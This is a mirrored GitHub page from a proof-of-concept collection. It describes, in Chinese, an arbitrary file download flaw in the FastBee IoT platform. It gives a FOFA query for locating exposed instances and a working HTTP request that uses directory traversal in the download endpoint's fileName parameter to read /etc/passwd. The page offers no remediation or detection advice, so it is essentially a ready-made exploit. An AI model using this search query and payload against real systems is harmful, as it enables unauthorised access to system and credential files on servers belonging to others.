admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
wy876_POC/蜂信物联/蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞.md

19 lines
466 B
Markdown
Raw Permalink Normal View History

240902更新漏洞
2024-09-02 10:54:47 +08:00
# 蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞
蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞可能导致敏感信息泄露、数据盗窃及其他安全风险从而对系统和用户造成严重危害。
## fofa
```javascript
"fastbee"
```
## poc
```javascript
GET /prod-api/iot/tool/download?fileName=/../../../../../../../../../etc/passwd HTTP/1.1
Host:
Accept-Encoding: gzip, deflate, br
```
Reference in New Issue Copy Permalink